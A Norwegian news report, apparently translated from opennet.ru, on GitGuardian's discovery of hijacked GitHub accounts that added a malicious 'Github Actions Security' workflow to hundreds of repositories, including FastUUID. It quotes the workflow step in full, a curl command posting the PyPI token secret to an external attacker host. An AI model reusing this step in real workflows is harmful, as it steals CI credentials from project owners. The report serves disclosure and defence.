Forskere fra GitGuardian har identifisert et massivt angrep på GitHub-brukere som involverte kontroll over 327 kontoer og installasjon av en ondsinnet Github Action-håndterer i 817 repositorier. Angrepet resulterte i lekkasje av 3325 hemmeligheter som brukes i kontinuerlige integrasjonssystemer og sendes gjennom miljøvariabler, inkludert tilgangstokener til PyPI, GitHub, NPM, DockerHub og diverse skylagringstjenester.
GitHub Actions lar kodeutviklere legge til behandlere for å automatisere ulike operasjoner i GitHub. For eksempel kan GitHub Actions brukes til å utføre visse kontroller og tester ved commit, eller til å automatisere behandlingen av nye Issues. Den ondsinnede behandleren ble distribuert under navnet «Github Actions Security» og inkluderte en «curl»-kommando i «run»-delen som sendte innholdet i miljøvariabler til en ekstern vert når oppgaver kjørtes i et kontinuerlig integrasjonsmiljø. Den ondsinnede commiten ble lagt til fra kontoene til prosjektvedlikeholdere, som sannsynligvis tidligere var hacket eller phishing.
Angrepet ble oppdaget etter å ha analysert unormal aktivitet relatert til FastUUID-pakken, som tilbyr en Python-wrapper for Rust UUID-biblioteket. FastUUID, som har blitt lastet ned nesten 1.2 millioner ganger den siste uken, brukes som en avhengighet i det populære LiteLLM-prosjektet, som har over 5 millioner nedlastinger per uke på PyPI. Analyse av endringer i FastUUID-depotet viste at prosjektvedlikeholderen 2. september la til en commit med en ny Github Action-håndterer, som inneholdt kode for å sende et token til PyPI-depotet på en ekstern vert. — navn: Github Actions Security run: | curl -s -X POST -d 'PYPI_API_TOKEN=${{ secrets.PYPI_API_TOKEN }}' https://bold-dhawan.45-139-104-115.plesk.page
Problemet ble identifisert før angriperne brukte den avlyttede tokenen – ingen ondsinnede endringer eller modifiserte versjoner av pakken ble publisert til PyPI for FastUUID. Lignende Github Action-erstatninger ble oppdaget i 816 flere repositorier, og varsler ble sendt til eierne deres, samt til administrasjonen av PyPI, GitHub, NPM og DockerHub. Per i går kveld var ondsinnede commits blitt tilbakestilt i omtrent 100 repositorier. For øyeblikket identifiserer et søk i GitHub 671 commits med ondsinnet Github Action.
Kilde: opennet.ru
